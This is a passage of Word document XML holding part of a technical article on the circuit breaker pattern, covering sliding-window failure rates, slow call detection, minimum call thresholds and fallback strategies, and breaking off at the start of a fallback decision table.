    <w:p w14:paraId="1655CB25" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>[Bucket 0: 5 fail, 95 ok] [Bucket 1: 3 fail, 97 ok] ... [Bucket 9: 45 fail, 55 ok]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="745F03FC" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>←── oldest ────────────────────────────────────────────────── newest ──→</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C28C790" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:lastRenderedPageBreak/>
        <w:t>Each bucket accumulates metrics for its 6-second period. When a new bucket starts, the oldest bucket is discarded. The circuit breaker aggregates all active buckets to compute the current failure rate.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="437CEA9B" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Why sliding window is better:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A410990" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="997"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Always reflects the CURRENT state (old data automatically expires).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C189735" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="997"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Unaffected by traffic volume fluctuations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="766D8113" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="997"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>More predictable behavior (time-bound rather than count-bound).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61FDB847" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Resilience4j's sliding window:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D9357BA" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="789975E6" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>Sliding window type: TIME_BASED</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="324CF802" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>Window size: 60 seconds</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DD33D84" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>Divided into: 10 partial aggregations (6s each)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BEBD429" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>Failure rate threshold: 50%</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6136EF40" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>Minimum number of calls: 20 (don't evaluate if &lt; 20 calls in window)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13855999" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.3 Slow Call Detection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DCAF2E8" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The insight:</w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:t> A service that responds, but takes 10 seconds per request, is as dangerous as one that returns errors. Slow calls consume resources just as effectively as failures.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DD5B48D" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>How slow call detection works:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A7C723E" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53379973" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>Slow call duration threshold: 3 seconds</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1706C452" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>Slow call rate threshold: 80%</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79A634B5" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>If 80% of calls in the window exceed 3 seconds → trip the breaker (even if they all "succeed").</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7841096C" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Why this is critical:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7213763B" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>Consider a database whose query performance degrades from 50ms to 8 seconds:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FABBB54" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="998"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>No errors — queries still eventually complete.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A3E7622" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="998"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>But threads are blocked for 8 seconds each.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3946D07E" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="998"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:lastRenderedPageBreak/>
        <w:t>Thread pool exhaustion occurs (same as if the database were returning errors).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CB938F4" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="998"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Without slow-call detection, the circuit breaker sees "100% success rate" and stays closed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18CAD7E9" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="998"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>The caller dies from thread exhaustion despite the breaker being "closed."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38C9D572" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Combined strategy:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="320E3B0D" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66FC23E2" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>Trip if:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71F97DD9" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">  failure_rate &gt; 50%  (errors)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B5DEB7E" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">  OR slow_call_rate &gt; 80%  (degraded performance)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D1FE56A" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.4 The Minimum Throughput Threshold</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BB0E687" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Why it's needed:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C88ACC7" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>Without a minimum threshold:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7258F8B3" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="999"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>1 request arrives in the window. It fails. Failure rate = 100%. Circuit trips.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A49E3E3" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="999"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>But one failure is not statistically significant. It could be a network blip, a single bad request.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FB854DA" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The solution:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D9C23C9" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A15A1C6" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>Minimum number of calls in window: 20</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AEBF4E9" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>The circuit breaker only evaluates the failure rate AFTER at least 20 calls have been recorded. Below 20 calls, it remains closed regardless of failure rate.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="691F4929" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>This prevents:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7046A4C6" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1000"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Tripping on a single failure.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="612C3BEF" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1000"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Tripping during low-traffic periods (night, weekends) where a small absolute number of errors creates a high percentage.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79043156" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1000"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Excessive sensitivity at startup (few requests, any failure = high rate).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30E5B790" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:pict w14:anchorId="537D896A">
          <v:rect id="_x0000_i4245" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="77BFEAF2" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4. What Happens During an Open Circuit — The Caller's Perspective</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18A54BBD" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>4.1 Immediate Failure (No Fallback)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18575506" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>The simplest case: Circuit is open → return an error to the caller immediately.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="696585F8" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76D15D2C" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>Client → Service A → Circuit Breaker (OPEN) → throw CircuitBreakerOpenException</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58F05845" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>Service A → Return HTTP 503 to client: "Service temporarily unavailable"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17772F80" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>When this is appropriate:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52661292" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1001"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>The operation has no meaningful fallback (e.g., "fetch user's latest bank balance" — there's no approximate answer).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30E35969" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1001"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>The client can handle the error gracefully (retry later, show informative message).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CE9D9FA" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4.2 Fallback Responses</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="525C1493" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Static fallback:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="318E338E" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1002"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Return a cached/default value.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="375C947F" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1002"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>"Recommendation service is down → show generic popular items instead of personalized ones."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75B991AB" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1002"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>"Payment validation service is down → accept the payment optimistically (within risk threshold) and validate later."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B163C8A" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Cached fallback:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F1D57DE" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1003"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Return the last known good response (from a local cache).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33C0C27B" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1003"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>"User profile service is down → return the profile data from 5 minutes ago."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04F1B291" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1003"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Slightly stale but functional.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="475C1BE6" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Degraded functionality:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33A71B60" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1004"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Skip the failing component entirely and return a partial response.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CD1FD08" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1004"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>"Product page without reviews (review service circuit is open)."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EE4D681" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1004"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>"Search results without spell correction (spell-check service circuit is open)."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C05C7FC" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Alternative service (failover):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04D60670" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1005"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Route to a backup/secondary instance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21C19BC7" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1005"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>"Primary payment processor circuit is open → route to backup processor."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B81F7C3" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1005"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:lastRenderedPageBreak/>
        <w:t>"Primary database is slow → read from the read replica instead."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="640ABED7" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Queue for later:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B48377E" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1006"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Accept the request but queue it for processing when the downstream recovers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C859A23" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1006"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>"Email service circuit is open → queue the email, send it when the circuit closes."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C7727D9" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1006"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Ensures no work is lost, but with delayed execution.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6240A8D7" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4.3 The Fallback Decision Framework</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399"/>
        <w:gridCol w:w="2193"/>
        <w:gridCol w:w="1632"/>
      </w:tblGrid>
      <w:tr w:rsidR="006E6644" w:rsidRPr="006E6644" w14:paraId="3F46E19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9A275B" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006E6644">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Question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E4B36F" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006E6644">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>If Yes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C4A050" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
